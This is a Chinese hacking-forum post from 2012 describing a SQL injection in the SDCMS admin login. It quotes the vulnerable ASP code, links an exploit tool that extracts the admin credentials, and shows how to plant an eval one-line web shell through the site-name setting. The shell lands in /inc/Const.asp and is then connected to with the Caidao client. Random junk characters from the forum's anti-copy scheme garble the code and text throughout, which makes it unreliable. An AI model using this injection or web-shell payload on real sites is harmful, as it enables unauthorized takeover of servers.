作者:T00LS 鬼哥# }3 B: U; }$ O5 Z
漏洞文件:后台目录/index.asp
5 d. ]0 p! B2 M+ ~$ b! x1 p" ? _, @3 k9 q w( Z0 O
Sub Check5 g) {- o9 H0 e3 |% e
Dim username,password,code,getcode,Rs4 Z& ]$ K: c, s, ]$ q; Z+ Z% K
IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub3 r0 r6 b0 h0 x7 q8 W+ j) u
username=FilterText(Trim(Request.Form("username")),1)$ v5 B$ c2 a1 b: R
password=FilterText(Trim(Request.Form("password")),1)" U( h- R8 h/ R* f5 f5 d
code=Trim(Request.Form("yzm"))
|4 G" |/ x; H) |( [ getcode=Session("SDCMSCode")3 l0 _! v. X, c( ^
IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died
/ m7 h. g' U J4 H IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)" ied
. r" u% |$ y; Q& E1 M1 I IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)"ied
: P F8 q7 r6 ^& v) i IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)"ied
( i: k+ ~; Z5 j IF username="" or password="" Then5 N/ l6 M; w; Y; Q9 q2 z
Echo "用户名或密码不能为空"ied
9 W& e3 l7 @8 _( r' U( d Else0 y7 i$ D$ r( E* h
Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")
8 s) Y7 C2 Z3 C- Y8 x- V IF Rs.Eof Then9 I: Q+ {% J+ D; H
AddLog username,GetIp,"登录失败",1
& S% i# d% c! }4 S" M Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"& r1 _! K8 j2 t6 L' s
Else0 z9 ^& d$ p4 M+ D* f6 Y1 X
Add_Cookies "sdcms_id",Rs(0)
1 P5 d& i& Y% [: L1 U: X0 ? Add_Cookies "sdcms_name",username8 B4 u ]0 S. N" Y
Add_Cookies "sdcms_pwd",Rs(2)& d) r& N# K7 u) N$ M
Add_Cookies "sdcms_admin",Rs(3)
f1 s% e7 N. O4 q: _7 h8 a0 \; h Add_Cookies "sdcms_alllever",Rs(4)7 H4 _ Q5 U) O; i/ H V. O
Add_Cookies "sdcms_infolever",Rs(5)
_! o' Z! f( Z; r$ c1 T( _% y Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")
: e# i4 G" I, x, Y& `( s* h AddLog username,GetIp,"登录成功",1
* R3 W5 J6 h) Y+ W: K* W% C H '自动删除30天前的Log记录
# }4 |" @, P7 F" E: z6 ^9 ]! a" Y IF Sdcms_DataType Then
. \5 H# I% D* X6 d' j6 C% X) s Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")
( n/ z2 y$ X% S5 } Else8 p. \' u. u% i" z
Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")- m) |7 X4 {2 S
End IF5 P- T I8 H* i! H' H+ B7 I1 R
Go("sdcms_index.asp")
1 i6 u! V. T6 K End IF" `" { ?# W5 b) @; D( k
Rs.Close3 z0 z$ E r( U/ }/ D1 |9 q
Set Rs=Nothing
+ D9 k7 l6 B2 d' ~4 W1 X. l End IF
. U3 T( O2 a* m% k" jEnd Sub2 E- I+ B. v8 |. c8 ~
* S7 b( [$ O* P0 ]* Q- J' `
’我们可以看到username是通过FilterText来过滤的。我们看看FilterText的代码
/ I' A! K! ?7 z7 p8 b$ z
! q5 b6 X0 i5 F% q+ c' Z: F! nFunction FilterText(ByVal t0,ByVal t1)8 a! J6 c. v! f/ z' r8 L
IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function
. w2 b% C b; Q2 B* ^6 R# o( }* k t0=Trim(t0)* P) S% g2 W/ W
Select Case t1
; \6 \, V$ E$ S" A Case "1"' ]: o) O: {9 R# m& ?- k% Q4 W
t0=Replace(t0,Chr(32),"")
6 o8 G) S8 e5 P% o, r: Y! r t0=Replace(t0,Chr(13),"")
; ?- o; l& S& V- Y# P9 w4 [ t0=Replace(t0,Chr(10)&Chr(10),"")
6 V# L+ b) O2 n S3 @ t0=Replace(t0,Chr(10),"")
+ [/ y( d4 C! {8 ?6 H2 I! M/ m5 ] Case "2"0 D3 E9 b' }3 Z( ~
t0=Replace(t0,Chr(8),"")'回格
# \4 ~- d( f1 Q t0=Replace(t0,Chr(9),"")'tab(水平制表符)
2 R0 B- D0 T) D1 L. \ t0=Replace(t0,Chr(10),"")'换行+ o% f) n2 m/ G& l
t0=Replace(t0,Chr(11),"")'tab(垂直制表符)
( E) |# [; f6 O0 D) w. X t0=Replace(t0,Chr(12),"")'换页
6 p8 C+ [; w( K2 ^3 Q( G t0=Replace(t0,Chr(13),"")'回车 chr(13)&chr(10) 回车和换行的组合
/ O5 E5 y+ Q! i a" J! D t0=Replace(t0,Chr(22),"")" I2 U: M* }2 m
t0=Replace(t0,Chr(32),"")'空格 SPACE
# U! {" R6 s( r& e6 _0 O6 i t0=Replace(t0,Chr(33),"")'!
/ a1 P. [+ i9 {9 b5 [3 t t0=Replace(t0,Chr(34),"")'"
( F# x* I7 S* @' e# e6 ~ t0=Replace(t0,Chr(35),"")'#! m. O# f1 J1 f1 _7 l& I( @
t0=Replace(t0,Chr(36),"")'$
3 [7 I: w8 S ~1 P t0=Replace(t0,Chr(37),"")'%
- x) f$ R% M: W" M: s" U( N t0=Replace(t0,Chr(38),"")'&
, Z. L: b( K7 V: m' K8 n t0=Replace(t0,Chr(39),"")''7 v2 r. l/ @/ a2 W! h
t0=Replace(t0,Chr(40),"")'(, N" W3 l, ~9 h0 H! g; B& l
t0=Replace(t0,Chr(41),"")')" e7 o7 b! g9 @
t0=Replace(t0,Chr(42),"")'*
+ _# i4 P# j l3 [3 q6 J; H( n t0=Replace(t0,Chr(43),"")'+
' j; C; c9 ]+ j; @ t0=Replace(t0,Chr(44),"")',
; C# b& X+ _1 O" D% \5 w t0=Replace(t0,Chr(45),"")'-
& S( y$ S9 r9 A* @ t0=Replace(t0,Chr(46),"")'.
$ \7 T) R8 T0 f6 [) ~8 X* @" t t0=Replace(t0,Chr(47),"")'/+ _ C. X- ^: y% E9 }
t0=Replace(t0,Chr(58),"")':
& u- Y# N; t" _0 _5 o& x# } t0=Replace(t0,Chr(59),"")';
' _- c( b: `" {) G9 J1 V t0=Replace(t0,Chr(60),"")'< t0=Replace(t0,Chr(61),"")'= t0=Replace(t0,Chr(62),"")'>- Z# k k. t8 K! O6 B( _: w2 {
t0=Replace(t0,Chr(63),"")'?! z; I. p3 w A* Y3 \9 b( k
t0=Replace(t0,Chr(64),"")'@8 v& O& u5 c! y2 t% L7 U. C% a
t0=Replace(t0,Chr(91),"")'\1 ~ G( N! q; D0 x' d9 f2 b0 W7 F
t0=Replace(t0,Chr(92),"")'\
+ @/ ?( [9 m/ x" c) W t0=Replace(t0,Chr(93),"")']; K6 l( E9 Q. O4 x% a' H
t0=Replace(t0,Chr(94),"")'^
/ e3 R# j) h3 A3 y t0=Replace(t0,Chr(95),"")'_4 ~. s% @, r. a5 y B) A. F
t0=Replace(t0,Chr(96),"")'`$ l3 g$ h8 j" z' i7 V5 H
t0=Replace(t0,Chr(123),"")'{; O2 R" n, O0 q o) C
t0=Replace(t0,Chr(124),"")'|
& q0 f2 C/ y8 P5 P* ^! x t0=Replace(t0,Chr(125),"")'}
7 _' X" R0 G1 Q/ L" U t0=Replace(t0,Chr(126),"")'~* p9 H' |/ K8 e( @# s$ I
Case Else
* H1 T0 y" c) L, b! `' s t0=Replace(t0, "&", "&")
* q5 m; X' K! R1 k( y" R, B t0=Replace(t0, "'", "'")- ~; {* j' H( R* {6 W/ M' ?
t0=Replace(t0, """", """)
+ Z- }+ K" ?: P/ M t0=Replace(t0, "<", "<") t0=Replace(t0, ">", ">")( g1 }. u1 [& X0 R5 e j
End Select( X$ E9 H! H! M
IF Instr(Lcase(t0),"expression")>0 Then
( w) X" V+ [- h9 x. A t0=Replace(t0,"expression","e­xpression", 1, -1, 0)
5 [0 m% {6 x; a) Z# v+ N; ] End If
. l: u& f. d- G1 d FilterText=t0
, e+ d+ p4 r* R, G, o# J- nEnd Function
2 o. [% M3 D J, H, F# l$ i3 S6 L7 [8 l* N9 b t3 ` o, a
看到没。直接参数是1 只过滤, n1 @, W: ~4 Y+ P7 ?! o& O
t0=Replace(t0,Chr(32)," ")/ r# e* N$ j' W0 B
t0=Replace(t0,Chr(13),"")
- u. m, p; X+ W* W# U t0=Replace(t0,Chr(10)&Chr(10),"! [+ p/ C' T& i
")
! U ^! ^5 F5 J' [2 ^' Z# o( L1 u+ V t0=Replace(t0,Chr(10),"
6 f1 V+ j' c/ n& t; Q- s3 f% }"), L/ J, }8 N* x* U
漏洞导致可以直接拿到后台帐号密码。SDCMS默认后台地址/admin/如果站长改了后台路径,那么请自行查找!
$ j4 O8 [% g5 N. qEXP利用工具下载 (此工具只能在XP上运行):sdcms-EXP/ c8 f/ n; f9 y7 V; a7 [
% {9 A5 M7 ~' i( @: C
测试:2 v4 W& x7 F3 d8 B. U2 q( g2 ~
3 I: v/ J# P3 p7 j9 l) \' N! q6 ^9 F7 L- f
现在输入工具上验证码,然后点OK4 L1 f }1 U% R, x8 M" r
4 h- L- y" j5 u1 @: Z; |
' F; I7 A3 y8 ]* X8 P看到我们直接进入后台管理界面了,呵呵!4 M5 c$ E' F$ @: T+ [' X8 ?
# [- i4 \1 K" C+ _* E; G, m+ y
- }9 u* f- g, w n: w f7 Q8 ^" m- B( |. o% b" Y" r3 D
这样直接进入后台了。。。。
+ g# {' v) g) p5 D7 Y' Y: U4 x+ @) K% Q7 u( r8 H; z4 v
" h1 k4 s$ D2 X3 O, f
' {- M! |, ^* h% [, I+ wSDCMS提权:
, R! u' ^( T1 J% A4 N
1 Y) _: g) q2 N方法1:访问:/后台目录/sdcms_set.asp 在 网站名称:后面加个 “:eval(request(Chr(63)))’ 即可,直接写一句话进去。 写入到/inc/Const.asp 一句话连接密码是?" F1 p- c1 o( d, X0 L
7 n5 }. i6 F5 Z. m$ p
4 D# L; @0 j c- }
1 N, |! c1 c2 iOK,现在用菜刀连接下!3 _7 G% h9 ^/ x) e8 I* i+ g& }
Y' Y4 {! o4 N: g2 M
/ r( W8 o) d4 L# V9 A: {8 h% q
2 d9 V/ E1 h; E3 j6 ~ 3 J# w! e& J% Y7 U( ~/ K; m2 A
: o% Y" E2 U8 c7 C3 H$ y8 b |
发表于 2012-11-9 20:57:02
收藏
支持
反对